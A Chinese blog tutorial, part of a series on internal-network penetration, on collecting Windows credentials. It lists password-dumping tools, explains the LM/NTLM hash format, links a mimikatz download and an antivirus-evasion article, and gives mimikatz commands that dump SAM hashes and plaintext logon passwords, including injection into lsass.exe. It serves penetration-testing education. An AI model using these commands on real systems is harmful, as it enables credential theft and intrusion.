码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 内网渗透之内网信息收集(五)


    目录

    凭证信息收集

    01凭证获取工具

    02密码hash

    03mimikatz

    04get-hashs

    内网渗透之内网信息收集(六)_不知名白帽的博客-CSDN博客


    凭证信息收集

    01凭证获取工具

    常用来获取windows密码的工具

    1. mimikatz
    2. wce
    3. pwddump7
    4. ophcrack
    5. procdump+mimikatz
    6. lazagne

    02密码hash

    LM哈希&NTLM型哈希

    winodws hash:

    2000

    xp

    2003

    Vista

    win7

    2008

    2012

    LM

    √

    √

    √

    NTLM

    √

    √

    √

    √

    √

    √

    √

    windows本地hash:

    http://www.secpulse.com/archives/65256.html

    windows系统下hash密码格式:

    用户名称:RID:LM-HASH值:NT-HASH值

    03mimikatz

    mimikatz下载:

    链接:https://pan.baidu.com/s/1ZbQM5YrgNyqmHFWBySSJjg

    提取码:jryu

    非本地交互式凭证获取

    mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

    mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"

    一般都是通过远程登陆靶机,在靶机内下载mimikatz

    log result.txt(将结果传到txt中)

    privilege::debug(提权)

    token::elevate(模拟令牌:用于将权限提升为SYSTEM (默认)或在框中找到域管理员令牌)

    获取到system用户的token

    lsadump::sam(获得用户哈希)

    sekurlsa::logonpasswords(获取明文密码)

    mimikatz1.x版本:

    privilege::debug //提升权限

    inject::process lsass.exe sekurlsa.dll //注入sekurlsa.dll到lsass.exe进程里

    @getLogonPasswords //获取密码

    mimikatz免杀:

    https://www.freebuf.com/articles/system/234365.html

    04get-hashs

  • 相关阅读:
    数据库指令合集(持续更新中)
    Github仓库每日更新京东、淘宝、天猫各品类优惠券
    Vue组件中的生命周期函数执行流程
    音乐播放
    Arthas应用诊断
    手机抓包方式汇总
    深入理解参数-@Param和 对象作为参数重要
    C++:delete和delete[]释放内存的区别
    基于深度学习的驾驶员疲劳监测系统的设计与实现
    进一步了解视频美颜SDK:美颜SDK的技术原理
  • 原文地址:https://blog.csdn.net/lyshark_lyshark/article/details/126800059
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号